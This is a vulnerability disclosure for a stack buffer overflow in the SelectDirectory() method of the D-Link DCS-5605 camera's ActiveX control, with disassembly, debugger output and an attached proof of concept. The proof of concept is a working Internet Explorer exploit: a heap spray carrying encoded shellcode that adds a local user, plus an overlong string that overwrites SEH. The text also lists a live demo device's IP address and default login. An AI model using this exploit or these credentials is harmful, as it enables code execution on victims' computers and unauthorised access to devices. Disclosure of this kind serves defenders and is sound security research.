D-Link SecuriCam DCS-5605 Network Surveillance ActiveX Control
DcsCliCtrl.dll lstrcpyW Remote Buffer Overflow Vulnerability

tested against: Microsoft Windows Server 2003 r2 sp2
                Internet Explorer 7/8

Live demo: http://203.125.227.70/eng/index.cgi
username: dlink
password: dlink

product homepage: http://www.d-link.com/products/?pid=771

product description:
"The DCS-5605 is a high performance camera for professional surveillance
and remote monitoring. This network camera features motorized pan,
tilt, and optical/digital zoom for ultimate versatility. The 10x optical
zoom lens delivers the level of detail necessary to identify faces, license
plate numbers, and other important details that are difficult to
clearly distinguish using digital zoom alone"

background:
When browsing the device web interface, the user
is asked to install an ActiveX control to stream
video content. This control has the following settings:

Description: Camera Stream Client Control
File version: 1.0.0.4519
Binary path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll
ProgID: DcsCliCtrl.DCSStrmControl.1
GUID: {721700FE-7F0E-49C5-BDED-CA92B7CB1245}
Implements IObjectSafety: Yes
Safe For Scripting (IObjectSafety): True
Safe For Initialization (IObjectSafety): True

Vulnerability:
the ActiveX control exposes the SelectDirectory()
method which supports one optional argument.
See typelib:
...
/* DISPID=22 */
 /* VT_BSTR [8] */
 function SelectDirectory(
  /* VT_VARIANT [12] [in] */ $varDefPath
  )
 {
  /* method SelectDirectory */
 }
...

This method suffers of a stack based buffer overflow vulnerability
because an unsafe lstrcpyW() call inside DcsCliCtrl.dll:

...
100712E0   81EC 34040000    sub esp,434
100712E6   A1 2C841010      mov eax,dword ptr ds:[1010842C]
100712EB   33C4             xor eax,esp
100712ED   898424 30040000  mov dword ptr ss:[esp+430],eax
100712F4   53               push ebx
100712F5   8B9C24 48040000  mov ebx,dword ptr ss:[esp+448]
100712FC   55               push ebp
100712FD   8BAC24 40040000  mov ebp,dword ptr ss:[esp+440]
10071304   56               push esi
10071305   8BB424 4C040000  mov esi,dword ptr ss:[esp+44C]
1007130C   57               push edi
1007130D   8BBC24 4C040000  mov edi,dword ptr ss:[esp+44C]
10071314   68 08020000      push 208
10071319   8D4424 34        lea eax,dword ptr ss:[esp+34]
1007131D   6A 00            push 0
1007131F   50               push eax
10071320   E8 0BC40300      call DcsCliCt.100AD730
10071325   83C4 0C          add esp,0C
10071328   85F6             test esi,esi
1007132A   74 0C            je short DcsCliCt.10071338
1007132C   56               push esi
1007132D   8D4C24 34        lea ecx,dword ptr ss:[esp+34]
10071331   51               push ecx
10071332   FF15 D4D20C10    call dword ptr ds:[<&KERNEL32.lstrcpyW>] ; kernel32.lstrcpyW <-------------
...

An attacker could entice a remote user to browse a web
page to gain control of the victim browser, by passing an overlong string to
the mentioned method and overwriting critical structures (SEH).

As attachment proof of concept code.

Note, to reproduce the wanted crash:
when the SelectDirectory() method is called the
user is asked to select a destination folder for the stream recorder.
To set EIP to 0x0c0c0c0c select a folder of choice, then proceed.
When clicking Cancel you have an unuseful crash, however it could be
possible that modifying the poc you will have EIP overwritten aswell.

I think that it is also possible that other products might carry this dll,
I could post an update if I find more.

Additional note:

0:029> lm -vm DcsCliCtrl
start    end        module name
08450000 0859e000   DcsCliCtrl   (deferred)            
    Image path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll
    Image name: DcsCliCtrl.dll
    Timestamp:        Thu Aug 19 08:48:47 2010 (4C6CD3CF)
    CheckSum:         001325EC
    ImageSize:        0014E000
    File version:     1.0.0.4519
    Product version:  1.0.0.1
    File flags:       0 (Mask 3F)
    File OS:          4 Unknown Win32
    File type:        2.0 Dll
    File date:        00000000.00000000
    Translations:     0409.04e4
    ProductName:      Camera Streaming Client
    InternalName:     DcsCliCtrl.dll
    OriginalFilename: DcsCliCtrl.dll
    ProductVersion:   1.0.0.1
    FileVersion:      1.0.0.4519
    FileDescription:  Camera Stream Client Control
    LegalCopyright:   Copyright: (c) All rights reserved.

<!--
D-Link DCS-5605 Network Surveillance ActiveX Control DcsCliCtrl.dll
lstrcpyW Remote Buffer Overflow Vulnerability poc
(ie7)

Description: Camera Stream Client Control
File version: 1.0.0.4519
Binary path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll
ProgID: DcsCliCtrl.DCSStrmControl.1
GUID: {721700FE-7F0E-49C5-BDED-CA92B7CB1245}
Implements IObjectSafety: Yes
Safe For Scripting (IObjectSafety): True
Safe For Initialization (IObjectSafety): True

rgod
-->
<!-- saved from url=(0014)about:internet -->
<html>
please select a directory to download ...
<object classid='clsid:721700FE-7F0E-49C5-BDED-CA92B7CB1245' id='obj' width=0 height=0 />
</object>
<script language='javascript'>
//add user one, user "sun" pass "tzu"
shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" +
"%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +
"%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +
"%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +
"%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" +
"%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" +
"%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" +
"%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" +
"%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" +
"%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" +
"%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" +
"%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" +
"%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" +
"%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" +
"%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" +
"%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" +
"%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" +
"%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" +
"%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" +
"%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" +
"%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" +
"%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" +
"%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" +
"%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" +
"%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" +
"%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" +
"%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" +
"%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" +
"%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" +
"%u7734%u4734%u4570");
bigblock = unescape("%u0c0c%u0c0c");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<666;i++){memory[i] = block+shellcode}
</script>
<script defer=defer>
var x = "";
for (i=0; i<200; i++){
  x = x + unescape("%u4141%u4141");
}
for (i=0; i<700; i++){
  x = x + unescape("%u0c0c%u0c0c");
}
obj.SelectDirectory(x);
</script>